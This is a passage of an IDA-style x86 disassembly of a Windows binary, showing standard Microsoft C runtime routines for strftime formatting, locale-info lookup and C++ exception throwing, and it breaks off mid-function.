; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_437F70 proc near ; CODE XREF: sub_437DE0+CE�p
; __store_winword+3EC�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
movsx eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
sub ecx, 25h
mov [ebp+var_C], ecx
cmp [ebp+var_C], 55h
ja loc_4384D8
mov eax, [ebp+var_C]
xor edx, edx
mov dl, ds:byte_438539[eax]
jmp ds:off_4384DD[edx*4]
loc_437FA3: ; DATA XREF: .text:0043850D�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+18h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4]
push eax
call __store_str
add esp, 0Ch
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_437FC5: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:004384E1�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+18h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+1Ch]
push eax
call __store_str
add esp, 0Ch
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_437FE8: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438511�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+38h]
push eax
call __store_str
add esp, 0Ch
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_43800B: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:004384E5�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+68h]
push eax
call __store_str
add esp, 0Ch
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_43802E: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438515�o
cmp dword_4F38B0, 0
jz short loc_4380B6
mov dword_4F38B0, 0
mov ecx, [ebp+arg_10]
push ecx ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_10]
mov eax, [edx+0A4h]
push eax ; Str1
call __store_winword
add esp, 14h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_438070
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_438070: ; CODE XREF: sub_437F70+F9�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 20h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
mov ecx, [ebp+arg_10]
push ecx ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_10]
mov eax, [edx+0A8h]
push eax ; Str1
call __store_winword
add esp, 14h
jmp short loc_438129
; ---------------------------------------------------------------------------
loc_4380B6: ; CODE XREF: sub_437F70+C5�j
mov ecx, [ebp+arg_10]
push ecx ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_10]
mov eax, [edx+0A0h]
push eax ; Str1
call __store_winword
add esp, 14h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_4380E5
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_4380E5: ; CODE XREF: sub_437F70+16E�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 20h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
mov ecx, [ebp+arg_10]
push ecx ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_10]
mov eax, [edx+0A8h]
push eax ; Str1
call __store_winword
add esp, 14h
loc_438129: ; CODE XREF: sub_437F70+144�j
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_43812E: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438519�o
mov ecx, dword_4F38B0
mov dword_4F38B4, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+arg_4]
mov edx, [ecx+0Ch]
push edx
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_438158: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:004384E9�o
mov eax, dword_4F38B0
mov dword_4F38B4, eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 2
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
push ecx
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_438180: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:004384ED�o
mov edx, dword_4F38B0
mov dword_4F38B4, edx
mov eax, [ebp+arg_4]
mov eax, [eax+8]
cdq
mov ecx, 0Ch
idiv ecx
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jnz short loc_4381AA
mov [ebp+var_4], 0Ch
loc_4381AA: ; CODE XREF: sub_437F70+231�j
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+var_4]
push ecx
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_4381C5: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:0043851D�o
mov edx, dword_4F38B0
mov dword_4F38B4, edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 3
mov edx, [ebp+arg_4]
mov eax, [edx+1Ch]
add eax, 1
push eax
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_4381F2: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438521�o
mov ecx, dword_4F38B0
mov dword_4F38B4, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+arg_4]
mov edx, [ecx+10h]
add edx, 1
push edx
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_43821F: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:004384F1�o
mov eax, dword_4F38B0
mov dword_4F38B4, eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 2
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
push ecx
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_438247: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438525�o
mov edx, [ebp+arg_4]
cmp dword ptr [edx+8], 0Bh
jg short loc_43826C
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+98h]
push eax
call __store_str
add esp, 0Ch
jmp short loc_438286
; ---------------------------------------------------------------------------
loc_43826C: ; CODE XREF: sub_437F70+2DE�j
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_10]
mov ecx, [eax+9Ch]
push ecx
call __store_str
add esp, 0Ch
loc_438286: ; CODE XREF: sub_437F70+2FA�j
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_43828B: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:004384F5�o
mov edx, dword_4F38B0
mov dword_4F38B4, edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 2
mov edx, [ebp+arg_4]
mov eax, [edx]
push eax
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_4382B4: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:004384F9�o
mov ecx, dword_4F38B0
mov dword_4F38B4, ecx
mov edx, [ebp+arg_4]
mov eax, [edx+18h]
mov [ebp+var_8], eax
jmp short loc_43831D
; ---------------------------------------------------------------------------
loc_4382CB: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438529�o
mov ecx, dword_4F38B0
mov dword_4F38B4, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 1
mov ecx, [ebp+arg_4]
mov edx, [ecx+18h]
push edx
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_4382F5: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:004384FD�o
mov eax, dword_4F38B0
mov dword_4F38B4, eax
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx+18h], 0
jnz short loc_438311
mov [ebp+var_8], 6
jmp short loc_43831D
; ---------------------------------------------------------------------------
loc_438311: ; CODE XREF: sub_437F70+396�j
mov edx, [ebp+arg_4]
mov eax, [edx+18h]
sub eax, 1
mov [ebp+var_8], eax
loc_43831D: ; CODE XREF: sub_437F70+359�j
; sub_437F70+39F�j
mov ecx, [ebp+arg_4]
mov edx, [ecx+1Ch]
cmp edx, [ebp+var_8]
jge short loc_438331
mov [ebp+var_4], 0
jmp short loc_43835E
; ---------------------------------------------------------------------------
loc_438331: ; CODE XREF: sub_437F70+3B6�j
mov eax, [ebp+arg_4]
mov eax, [eax+1Ch]
cdq
mov ecx, 7
idiv ecx
mov [ebp+var_4], eax
mov edx, [ebp+arg_4]
mov eax, [edx+1Ch]
cdq
mov ecx, 7
idiv ecx
cmp edx, [ebp+var_8]
jl short loc_43835E
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_43835E: ; CODE XREF: sub_437F70+3BF�j
; sub_437F70+3E3�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 2
mov edx, [ebp+var_4]
push edx
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_438379: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:0043852D�o
cmp dword_4F38B0, 0
jz short loc_4383B0
mov dword_4F38B0, 0
mov eax, [ebp+arg_10]
push eax ; int
mov ecx, [ebp+arg_C]
push ecx ; int
mov edx, [ebp+arg_8]
push edx ; int
mov eax, [ebp+arg_4]
push eax ; int
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A4h]
push edx ; Str1
call __store_winword
add esp, 14h
jmp short loc_4383D2
; ---------------------------------------------------------------------------
loc_4383B0: ; CODE XREF: sub_437F70+410�j
mov eax, [ebp+arg_10]
push eax ; int
mov ecx, [ebp+arg_C]
push ecx ; int
mov edx, [ebp+arg_8]
push edx ; int
mov eax, [ebp+arg_4]
push eax ; int
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A0h]
push edx ; Str1
call __store_winword
add esp, 14h
loc_4383D2: ; CODE XREF: sub_437F70+43E�j
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_4383D7: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438501�o
mov dword_4F38B0, 0
mov eax, [ebp+arg_10]
push eax ; int
mov ecx, [ebp+arg_C]
push ecx ; int
mov edx, [ebp+arg_8]
push edx ; int
mov eax, [ebp+arg_4]
push eax ; int
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A8h]
push edx ; Str1
call __store_winword
add esp, 14h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_438408: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438531�o
mov eax, dword_4F38B0
mov dword_4F38B4, eax
mov ecx, [ebp+arg_4]
mov eax, [ecx+14h]
cdq
mov ecx, 64h
idiv ecx
mov [ebp+var_4], edx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+var_4]
push ecx
call __store_num
add esp, 10h
jmp loc_4384D8
; ---------------------------------------------------------------------------
loc_43843E: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438505�o
mov edx, dword_4F38B0
mov dword_4F38B4, edx
mov eax, [ebp+arg_4]
mov eax, [eax+14h]
cdq
mov ecx, 64h
idiv ecx
mov ecx, eax
add ecx, 13h
imul ecx, 64h
mov edx, [ebp+arg_4]
mov eax, [edx+14h]
cdq
mov esi, 64h
idiv esi
add ecx, edx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 4
mov edx, [ebp+var_4]
push edx
call __store_num
add esp, 10h
jmp short loc_4384D8
; ---------------------------------------------------------------------------
loc_43848B: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:00438509�o
call ___tzset
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
cmp dword ptr [edx+20h], 0
setnz al
mov ecx, off_454624[eax*4]
push ecx
call __store_str
add esp, 0Ch
jmp short loc_4384D8
; ---------------------------------------------------------------------------
loc_4384B6: ; CODE XREF: sub_437F70+2C�j
; DATA XREF: .text:off_4384DD�o
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 25h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
loc_4384D8: ; CODE XREF: sub_437F70+1B�j
; sub_437F70+2C�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_437F70 endp
; ---------------------------------------------------------------------------
off_4384DD dd offset loc_4384B6 ; DATA XREF: sub_437F70+2C�r
dd offset loc_437FC5
dd offset loc_43800B
dd offset loc_438158
dd offset loc_438180
dd offset loc_43821F
dd offset loc_43828B
dd offset loc_4382B4
dd offset loc_4382F5
dd offset loc_4383D7
dd offset loc_43843E
dd offset loc_43848B
dd offset loc_437FA3
dd offset loc_437FE8
dd offset loc_43802E
dd offset loc_43812E
dd offset loc_4381C5
dd offset loc_4381F2
dd offset loc_438247
dd offset loc_4382CB
dd offset loc_438379
dd offset loc_438408
dd offset loc_4384D8
byte_438539 db 0 ; DATA XREF: sub_437F70+26�r
dw 1616h
dd 6 dup(16161616h), 16020116h, 16161616h, 16160403h, 16160516h
dd 6161616h, 8160716h, 160B0A09h, 16161616h, 0E0D0C16h
dd 1616160Fh, 16101616h, 16161116h, 16161612h, 13161616h
dd 0CC0B1514h
; [00000048 BYTES: COLLAPSED FUNCTION __store_str. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AD BYTES: COLLAPSED FUNCTION __store_num. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AC BYTES: COLLAPSED FUNCTION __store_number. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000480 BYTES: COLLAPSED FUNCTION __store_winword. PRESS KEYPAD "+" TO EXPAND]
off_438BC0 dd offset loc_438A2F ; DATA XREF: __store_winword+91�r
dd offset loc_438913
dd offset loc_43889E
dd offset loc_4387D8
dd offset loc_438816
dd offset loc_438877
dd offset loc_4388C5
dd offset loc_4388EC
dd offset loc_43895A
dd offset loc_438854
dd offset loc_438B10
byte_438BEC db 0 ; DATA XREF: __store_winword+8B�r
db 3 dup(0Ah)
dd 5 dup(0A0A0A0Ah), 0A010A0Ah, 0A0A0A0Ah, 0A0A020Ah, 0A030A0Ah
dd 4 dup(0A0A0A0Ah), 0A010A0Ah, 0A0A040Ah, 0A0A050Ah, 0A060A0Ah
dd 0A0A0A0Ah, 0A0A0807h
db 2 dup(0Ah), 9
dd offset loc_4387F7 ; DATA XREF: __store_winword+B0�r
dd offset loc_438801
dd offset loc_438807
dd offset loc_43880D
off_438C4F dd offset loc_438835 ; DATA XREF: __store_winword+EE�r
dd offset loc_43883F
dd offset loc_438845
dd offset loc_43884B
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438C60 proc near ; CODE XREF: __get_lc_time+41�p
; __get_lc_time+60�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = byte ptr -8Ch
Source = dword ptr -0Ch
Count = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0A8h
cmp [ebp+arg_0], 1
jnz loc_438DC9
mov eax, [ebp+arg_C]
mov [ebp+var_90], eax
lea ecx, [ebp+var_8C]
mov [ebp+Source], ecx
mov [ebp+var_4], 0
mov [ebp+var_94], 80h
push 0
mov edx, [ebp+var_94]
push edx
mov eax, [ebp+Source]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
call ___crtGetLocaleInfoA
add esp, 14h
mov [ebp+Count], eax
cmp [ebp+Count], 0
jnz loc_438D4F
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_438CD0
jmp loc_438DAD
; ---------------------------------------------------------------------------
loc_438CD0: ; CODE XREF: sub_438C60+69�j
push 0
push 0
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call ___crtGetLocaleInfoA
add esp, 14h
mov [ebp+var_94], eax
cmp [ebp+var_94], 0
jnz short loc_438CFA
jmp loc_438DAD
; ---------------------------------------------------------------------------
loc_438CFA: ; CODE XREF: sub_438C60+93�j
push 58h
push offset aInithelp_c ; "inithelp.c"
push 2
mov edx, [ebp+var_94]
push edx
call __malloc_dbg
add esp, 10h
mov [ebp+Source], eax
cmp [ebp+Source], 0
jnz short loc_438D20
jmp loc_438DAD
; ---------------------------------------------------------------------------
loc_438D20: ; CODE XREF: sub_438C60+B9�j
mov [ebp+var_4], 1
push 0
mov eax, [ebp+var_94]
push eax
mov ecx, [ebp+Source]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call ___crtGetLocaleInfoA
add esp, 14h
mov [ebp+Count], eax
cmp [ebp+Count], 0
jnz short loc_438D4F
jmp short loc_438DAD
; ---------------------------------------------------------------------------
loc_438D4F: ; CODE XREF: sub_438C60+5A�j
; sub_438C60+EB�j
push 63h
push offset aInithelp_c ; "inithelp.c"
push 2
mov ecx, [ebp+Count]
push ecx
call __malloc_dbg
add esp, 10h
mov edx, [ebp+var_90]
mov [edx], eax
mov eax, [ebp+var_90]
cmp dword ptr [eax], 0
jnz short loc_438D79
jmp short loc_438DAD
; ---------------------------------------------------------------------------
loc_438D79: ; CODE XREF: sub_438C60+115�j
mov ecx, [ebp+Count]
push ecx ; Count
mov edx, [ebp+Source]
push edx ; Source
mov eax, [ebp+var_90]
mov ecx, [eax]
push ecx ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_4], 0
jz short loc_438DA6
push 2
mov edx, [ebp+Source]
push edx
call __free_dbg
add esp, 8
loc_438DA6: ; CODE XREF: sub_438C60+136�j
xor eax, eax
jmp loc_438EE6
; ---------------------------------------------------------------------------
loc_438DAD: ; CODE XREF: sub_438C60+6B�j
; sub_438C60+95�j ...
cmp [ebp+var_4], 0
jz short loc_438DC1
push 2
mov eax, [ebp+Source]
push eax
call __free_dbg
add esp, 8
loc_438DC1: ; CODE XREF: sub_438C60+151�j
or eax, 0FFFFFFFFh
jmp loc_438EE6
; ---------------------------------------------------------------------------
loc_438DC9: ; CODE XREF: sub_438C60+D�j
cmp [ebp+arg_0], 0
jnz loc_438EE3
mov [ebp+var_A4], 4
mov ecx, [ebp+arg_C]
mov [ebp+var_9C], ecx
push 0
mov edx, [ebp+var_A4]
push edx
push offset byte_4F388C
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call ___crtGetLocaleInfoW
add esp, 14h
test eax, eax
jnz short loc_438E10
or eax, 0FFFFFFFFh
jmp loc_438EE6
; ---------------------------------------------------------------------------
loc_438E10: ; CODE XREF: sub_438C60+1A6�j
mov edx, [ebp+var_9C]
mov byte ptr [edx], 0
mov [ebp+var_A0], 0
jmp short loc_438E34
; ---------------------------------------------------------------------------
loc_438E25: ; CODE XREF: sub_438C60:loc_438EDA�j
mov eax, [ebp+var_A0]
add eax, 1
mov [ebp+var_A0], eax
loc_438E34: ; CODE XREF: sub_438C60+1C3�j
cmp [ebp+var_A0], 4
jge loc_438EDF
cmp SrcSizeInBytes, 1
jle short loc_438E7B
push 4 ; Type
mov ecx, [ebp+var_A0]
mov dl, byte_4F388C[ecx*2]
mov byte ptr [ebp+var_98], dl
mov eax, [ebp+var_98]
and eax, 0FFh
push eax ; C
call __isctype
add esp, 8
mov [ebp+var_A8], eax
jmp short loc_438EAE
; ---------------------------------------------------------------------------
loc_438E7B: ; CODE XREF: sub_438C60+1E8�j
mov ecx, [ebp+var_A0]
mov dl, byte_4F388C[ecx*2]
mov byte ptr [ebp+var_98], dl
mov eax, [ebp+var_98]
and eax, 0FFh
mov ecx, off_453CF4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_A8], edx
loc_438EAE: ; CODE XREF: sub_438C60+219�j
cmp [ebp+var_A8], 0
jz short loc_438ED8
mov eax, [ebp+var_9C]
movsx ecx, byte ptr [eax]
imul ecx, 0Ah
movsx edx, byte ptr [ebp+var_98]
lea eax, [ecx+edx-30h]
mov ecx, [ebp+var_9C]
mov [ecx], al
jmp short loc_438EDA
; ---------------------------------------------------------------------------
loc_438ED8: ; CODE XREF: sub_438C60+255�j
jmp short loc_438EDF
; ---------------------------------------------------------------------------
loc_438EDA: ; CODE XREF: sub_438C60+276�j
jmp loc_438E25
; ---------------------------------------------------------------------------
loc_438EDF: ; CODE XREF: sub_438C60+1DB�j
; sub_438C60:loc_438ED8�j
xor eax, eax
jmp short loc_438EE6
; ---------------------------------------------------------------------------
loc_438EE3: ; CODE XREF: sub_438C60+16D�j
or eax, 0FFFFFFFFh
loc_438EE6: ; CODE XREF: sub_438C60+148�j
; sub_438C60+164�j ...
mov esp, ebp
pop ebp
retn
sub_438C60 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, off_454F28
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000026D BYTES: COLLAPSED FUNCTION ___crtGetStringTypeW. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000101 BYTES: COLLAPSED FUNCTION __strnicmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000073 BYTES: COLLAPSED FUNCTION __setmode. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000CF BYTES: COLLAPSED FUNCTION __setmode_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000043D BYTES: COLLAPSED FUNCTION ___ld12mul. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C3 BYTES: COLLAPSED FUNCTION ___multtenpow12. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004F BYTES: COLLAPSED FUNCTION __mbsnbicoll. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AE BYTES: COLLAPSED FUNCTION ___wtomb_environ. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000195 BYTES: COLLAPSED FUNCTION ___crtGetLocaleInfoW. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001A5 BYTES: COLLAPSED FUNCTION ___crtGetLocaleInfoA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003F8 BYTES: COLLAPSED FUNCTION ___crtCompareStringA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000050 BYTES: COLLAPSED FUNCTION _strncnt_0. PRESS KEYPAD "+" TO EXPAND]
; [000002E0 BYTES: COLLAPSED FUNCTION ___crtsetenv. PRESS KEYPAD "+" TO EXPAND]
; [0000007C BYTES: COLLAPSED FUNCTION _findenv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000EE BYTES: COLLAPSED FUNCTION _copy_environ. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000ED BYTES: COLLAPSED FUNCTION __mbschr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A6C0 proc near ; CODE XREF: sub_40DD68+15�p
; sub_40DDFC+15�p ...
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A6C0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
lea eax, [ebp+var_3C]
push eax
push offset aStringTooLong ; "string too long"
lea ecx, [ebp+var_38]
call sub_40DD15
mov [ebp+var_4], 0
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_28]
call sub_43A870
push offset dword_43E460
lea edx, [ebp+var_28]
push edx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43A6C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A720 proc near ; CODE XREF: sub_43A7B0+10�p
; sub_43A990+E�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A720
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_10]
call ??0exception@@QAE@ABV0@@Z ; exception::exception(exception const &)
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
add ecx, 0Ch
push ecx
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_40DCEB
mov edx, [ebp+var_10]
mov dword ptr [edx], offset off_43E110
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_43A720 endp
; ---------------------------------------------------------------------------
align 10h
; [00000016 BYTES: COLLAPSED FUNCTION sub_43A790. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A7B0 proc near ; DATA XREF: .rdata:0043E118�o
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_1C]
call sub_43A720
push offset dword_43E4D0
lea ecx, [ebp+var_1C]
push ecx
call __CxxThrowException@8 ; _CxxThrowException(x,x)
mov esp, ebp
pop ebp
retn
sub_43A7B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A7E0 proc near ; CODE XREF: sub_43A840+A�p
; sub_43A910+13�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A7E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
mov dword ptr [eax], offset off_43E110
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_40DD38
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
call ??1exception@@UAE@XZ ; exception::~exception(void)
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43A7E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A840 proc near ; DATA XREF: .rdata:off_43E110�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43A7E0
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43A865
mov ecx, [ebp+var_4]
push ecx ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
add esp, 4
loc_43A865: ; CODE XREF: sub_43A840+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A870 proc near ; CODE XREF: sub_43A6C0+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43A8A0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43E120
mov eax, [ebp+var_4]
mov esp, ebp
